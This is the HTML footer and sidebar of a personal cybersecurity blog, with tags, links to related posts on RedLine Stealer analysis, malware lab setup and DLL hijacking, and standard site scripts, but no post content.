Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/Cyber-Blog/tags/windows/">windows</a> <a class="post-tag" href="/Cyber-Blog/tags/malware/">malware</a> <a class="post-tag" href="/Cyber-Blog/tags/forensics/">forensics</a> <a class="post-tag" href="/Cyber-Blog/tags/linux/">linux</a> <a class="post-tag" href="/Cyber-Blog/tags/techniques/">techniques</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/Cyber-Blog/posts/RedLineStealer/"><div class="card-body"> <span class="timeago small" >Dec 18, 2021<i class="unloaded">2021-12-18T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>RedLine Stealer</h3><div class="text-muted small"><p> This is my first threat analysis report. I’ve picked the RedLine Stealer because it was gaining popularity in early 2020 and is still being widely spread in Dec 2021 (probably because of its contin...</p></div></div></a></div><div class="card"> <a href="/Cyber-Blog/posts/MalwareLabSetup/"><div class="card-body"> <span class="timeago small" >Jan 27, 2022<i class="unloaded">2022-01-27T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Malware Analysis Lab Setup</h3><div class="text-muted small"><p> This will be a basic tutorial on how to setup a malware analysis lab. Of course this isn’t the only way to do it and you might need to have a different setup depending on what you’re trying to achi...</p></div></div></a></div><div class="card"> <a href="/Cyber-Blog/posts/DLLHijacking/"><div class="card-body"> <span class="timeago small" >Nov 14, 2023<i class="unloaded">2023-11-14T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hijacking DLLs</h3><div class="text-muted small"><p> Overview Hijacking DLLs has been a very common technique for defense evasion, persistence and privilege escalation on Windows machines. I’ll explain and demonstrate two popular techniques used in ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/Cyber-Blog/posts/CAINELabSetup/" class="btn btn-outline-primary" prompt="Older"><p>Forensics Virtual Lab with CAINE</p></a> <a href="/Cyber-Blog/posts/DLLHijacking/" class="btn btn-outline-primary" prompt="Newer"><p>Hijacking DLLs</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/MarwanNour">Marwan Nour</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/Cyber-Blog/tags/windows/">windows</a> <a class="post-tag" href="/Cyber-Blog/tags/malware/">malware</a> <a class="post-tag" href="/Cyber-Blog/tags/forensics/">forensics</a> <a class="post-tag" href="/Cyber-Blog/tags/linux/">linux</a> <a class="post-tag" href="/Cyber-Blog/tags/techniques/">techniques</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/Cyber-Blog/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/Cyber-Blog/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/Cyber-Blog/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script>
